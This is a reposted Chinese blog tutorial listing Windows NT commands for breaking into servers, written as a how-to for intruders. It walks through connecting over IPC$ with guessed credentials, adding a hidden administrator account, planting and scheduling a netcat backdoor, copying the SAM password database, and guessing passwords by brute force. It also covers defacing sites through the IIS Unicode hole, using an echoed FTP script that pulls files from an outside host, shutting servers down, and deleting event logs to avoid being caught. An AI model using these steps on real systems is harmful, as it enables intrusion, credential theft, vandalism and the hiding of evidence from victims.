一般入侵常用的命令(轉自IINTERNET)

 

一般入侵所需要的幾個常用命令 一般入侵所需要的幾個常用命令

如果寫得不好別笑啊。我覺得寫這些更有用,不會像其他人一樣寫一些很無聊不現實的文章。當然這只是我的想法,我也有缺點的。

1:NET

只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!

這裡我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1

net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

退出的命令是

net use \\127.0.0.1\ipc$ /delte

下面的操作你必須登陸後才可以用.登陸的方法就在上面.

----------------------

下面我們講怎麼創建一個用戶,由於SA的權限相當於系統的超級用戶.

我們加一個heibai的用戶密碼為lovechina

net user heibai lovechina /add

只要顯示命令成功,那麼我們可以把他加入Administrator組了.

net localgroup Administrators heibai /add

----------------------

這裡是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這裡把對方的C盤映射到本地的Z盤.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

這樣可以打開對方的TELNET服務.

----------------------

這裡是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。

net user guest /active:yes

----------------------

這裡是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有權限就行了呀!

net user guest lovechina

net命令果然強大啊!

2:at

一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?

那麼需要用AT命令,這裡假設你已經登陸了那個服務器。

你首先要得到對方的時間,

net time \\127.0.0.1

將會返回一個時間,這裡假設時間為12:1,現在需要新建一個作業,其ID=1

at \\127.0.0.1 12:3 nc.exe

這裡假設了一個木馬,名為NC.EXE,這個東西要在對方服務器上.

這裡介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,端口為99.

等到了12:3就可以連接到對方的99端口.這樣就給對方種下了木馬.

3:telnet

這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的端口.

telnet 127.0.0.1 99

這樣就可以連到對方的99端口.那你就可以在對方運行命令了,這個也就是肉雞.

4:FTP

它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個WWW.51.NET,不錯的.當我們申請完後,它會給用戶名,密碼,以及FTP服務器.

在上傳前需要登陸先,這裡我們假設FTP服務器是WWW.51.NET,用戶名是HUCJS,密碼是654321

ftp www.51.net

他會要求輸入用戶,成功後會要求輸入密碼.

----------------------

下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\

get c:\index.htm d:\

假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下

put c:\index.htm d:\

5:copy

下面我說說怎樣把本地的文件複製到對方硬盤上去,需要建立好IPC$連接才有效。

這裡我們把本地C盤下的index.htm複製到127.0.0.1的C盤下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要複製到D盤下把C改為D,就行了!

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他複製到WINNT目錄裡

就要把輸入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把對方的文件複製過來,順便告訴大家NT的備份的數據庫放在x:\winnt\repair\sam._ sam._是數據庫的文件名

下面就把127.0.0.1的數據庫複製到本地C盤下

copy \\127.0.0.1\admin$\repair\sam._ c:\

----------------------

6:set

如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才准有),當然他的80端口要開,不然你黑給誰看。這時需要用SET命令!

下面是我得到的結果!我來分析它,只是找主頁在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP,這裡本來是顯示我的IP,被我刪除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這裡是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉紅色的那行就是對方主頁存放地址,這裡告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是主頁的名稱了。

7:nbtstat

如果你掃到一部NT的機子,他的136到139其中一個端口開了的話,就要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破解吧!

現在網上很多NT的機子都開了這些端口的,你可以練習下,我們來分析得到的結果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大寫哦。

下面是得到的結果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用戶。

這裡的用戶是PENTIUMII。

8:Shutdown

關了對方的NT服務器的命令

Shutdown \\IP地址 t:20

20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。

9:DIR

這個命令沒什麼好講,但是卻非常重要,他是查看一目錄裡的所有文件、文件夾。

你可以本地試下。

10:echo

著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。

我們假設我們要把「南京大屠殺鐵證如山,任何日本人不得抵賴!」寫入index.htm,有2種方法,大家看看有什麼區別。

echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>index.htm

echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>>index.htm

第一個的意思是覆蓋index.htm原有的內容,把「南京大屠殺鐵證如山,任何日本人不得抵賴!」寫進index.htm。

第二個的意思是把「南京大屠殺鐵證如山,任何日本人不得抵賴!」加到index.htm裡面。

「>>」產生的內容將追加進文件中,「>」則將原文件內容覆蓋。

大家可以本地試下。

可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載主頁到對方的目錄裡。

1、首先,我們需要申請一個免費的主頁空間。

2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren服務器為例。)
open upload.chinaren.com(你的FTP服務器,申請時你的空間提供商會給你的)
cnhack(你申請時的用戶名)
test(你申請時的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這裡是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)

具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數,執行文件裡的內容。)

等命令完成時,文件已經下載到你指定的文件裡了。

注意:取得文件後,請刪除cnhack.txt。(如果不刪除,很容易會給別人看到你的密碼。)

記得要 del c:\cnhack.txt

11:attrib

這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件屬性設置了只讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不行。倒!不過有這個命令就別怕了。

attrib -r index.htm

這個命令是把index.htm的只讀屬性去掉。

如果把「-」改為「+」則是把這個文件的屬性設置為只讀

----------------------

attrib +r index.htm

這個命令是把index.htm的屬性設置為只讀。

12:del

當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日誌,當然要刪除日誌啦!想被捉嗎。呵呵。

NT的日誌有這些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改成其他盤。

點閱: 32

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料